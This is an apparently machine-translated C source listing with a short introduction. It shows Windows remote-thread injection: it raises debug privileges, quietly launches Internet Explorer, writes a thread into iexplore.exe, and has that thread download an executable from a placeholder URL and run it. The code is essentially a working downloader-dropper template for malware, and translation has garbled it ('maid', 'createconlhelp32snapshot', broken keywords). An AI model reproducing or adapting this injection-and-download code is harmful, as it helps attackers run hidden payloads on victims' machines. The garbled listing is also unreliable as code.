This method directly writes ThreadProc, The CreateRemoteThread thread process function, to the target process, typical Elevation of Privilege-> opening a process-> Applying for space in the target process-> writing thread code-> CreateRemoteThread
# Include <tlhelp32.h>
# Include <stdio. h>
# Include <urlmon. h>
# Pragma comment (lib, "urlmon. lib ")
# Include <shellapi. h>
Typedef struct _ RemotePara
{
// Download the object url
Char Url [255];
// Save the file path
Char FilePath [255];
// URL of the URLDownloadToFile Function
DWORD DownAddr;
// Address of the WinexeC Function
DWORD ExecAddr;
} RemotePara;
DWORD _ stdcall ThreadProc (RemotePara * lpPara)
{
Typedef UINT (_ stdcall * MWinExec) (maid, UINT uCmdShow );
Typedef HRESULT (_ stdcall * MURLDownloadToFile) (LPUNKNOWN pCaller,
LPCTSTR szURL, LPCTSTR szFileName,
DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB );
MURLDownloadToFile myURLDownloadToFile;
// Obtain the URL of the URLDownloadToFile function from the structure.
MyURLDownloadToFile = (MURLDownloadToFile) lpPara-> DownAddr;
// Call the function to download the object
MyURLDownloadToFile (0, lpPara-> Url, lpPara-> FilePath, 0, 0 );
MWinExec myWinExec;
// Obtain the WinexeC function address from the structure
MyWinExec = (MWinExec) lpPara-> ExecAddr;
// Call the function to run the downloaded file
MyWinExec (lpPara-> FilePath, 1 );
Return 0;
}
DWORD GetProcessID (char * ProcessName)
{
PROCESSENTRY32 pe32;
Pe32.dwSize = sizeof (pe32 );
HANDLE hProcessSnap = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
If (hProcessSnap = INVALID_HANDLE_VALUE)
{
Printf ("createconlhelp32snapshot error ");
Return 0;
}
BOOL bProcess = Process32First (hProcessSnap, & pe32 );
While (bProcess)
{
If (strcmp (strupr (pe32.szExeFile), strupr (ProcessName) = 0)
Return pe32.th32ProcessID;
BProcess = Process32Next (hProcessSnap, & pe32 );
}
CloseHandle (hProcessSnap );
Return 0;
}
Int EnableDebugPriv (const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
If (! OpenProcessToken (GetCurrentProcess (),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
& HToken ))
{
Printf ("OpenProcessToken error \ n ");
Return 1;
}
If (! LookupPrivilegeValue (NULL, name, & luid ))
{
Printf ("LookupPrivilege error! \ N ");
}
Tp. PrivilegeCount = 1;
Tp. Privileges [0]. Attributes = SE_PRIVILEGE_ENABLED;
Tp. Privileges [0]. Luid = luid;
If (! AdjustTokenPrivileges (hToken, 0, & tp, sizeof (TOKEN_PRIVILEGES), NULL, NULL ))
{
Printf ("AdjustTokenPrivileges error! \ N ");
Return 1;
}
Return 0;
}
BOOL Inject (const DWORD dwRemoteProcessId)
{
If (EnableDebugPriv (SE_DEBUG_NAME ))
{
Printf ("add privilege error ");
Return FALSE;
}
HANDLE hWnd = OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );
If (! HWnd)
{
Printf ("OpenProcess failed ");
Return FALSE;
}
// Apply for memory space
Void * pRemoteThread = VirtualAllocEx (hWnd, 0,
1024*4, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE );
If (! PRemoteThread)
{
Printf ("VirtualAllocEx failed ");
Return FALSE;
}
// Write the remote function into the memory
If (! WriteProcessMemory (hWnd, pRemoteThread, & ThreadProc, 1024 ))
{
Printf ("WriteProcessMemory failed ");
Return FALSE;
}
// Enter the RemotePara Structure
RemotePara myRemotePara;
ZeroMemory (& myRemotePara, sizeof (RemotePara ));
HINSTANCE hurlmon = LoadLibrary ("urlmon. dll ");
HINSTANCE kernel = LoadLibrary ("kernel32.dll ");
MyRemotePara. DownAddr = (DWORD) GetProcAddress (hurlmon, "URLDownloadToFileA ");
MyRemotePara. ExecAddr = (DWORD) GetProcAddress (kernel, "WinExec ");
Char urlfile [255];
Strcpy (urlfile, "http: // xxx/1.exe ");
Strcpy (myRemotePara. Url, urlfile );
Strcpy (myRemotePara. FilePath, "c: \ a.exe ");
// Apply for memory space
RemotePara * pRemotePara = (RemotePara *) VirtualAllocEx (hWnd, 0, sizeof (RemotePara), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
If (! PRemotePara)
{
Printf ("VirtualAllocEx failed ");
Return FALSE;
}
// Write memory
If (! WriteProcessMemory (hWnd, pRemotePara, & myRemotePara, sizeof (myRemotePara), 0 ))
{
Printf ("WriteProcessMemory failed ");
Return FALSE;
}
// Create a thread
HANDLE hThread = CreateRemoteThread (hWnd, 0, 0, (LPTHREAD_START_ROUTINE) pRemoteThread, pRemotePara, 0, 0 );
If (! HThread)
{
Printf ("CreateRemoteThread failed ");
Return FALSE;
}
Return true;
}
Int APIENTRY WinMain (HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
Int nCmdShow)
{
Char Path [255];
GetSystemDirectory (Path, sizeof (Path ));
// Obtain the drive letter
Path [3] = 0x00;
Strcat (Path, "Program Files \ Internet Explorer \ ipolice.exe ");
WinExec (Path, SW_HIDE );
Sleep (1000 );
DWORD Pid = GetProcessID ("iexplore.exe ");
Inject (Pid );
Return 0;
}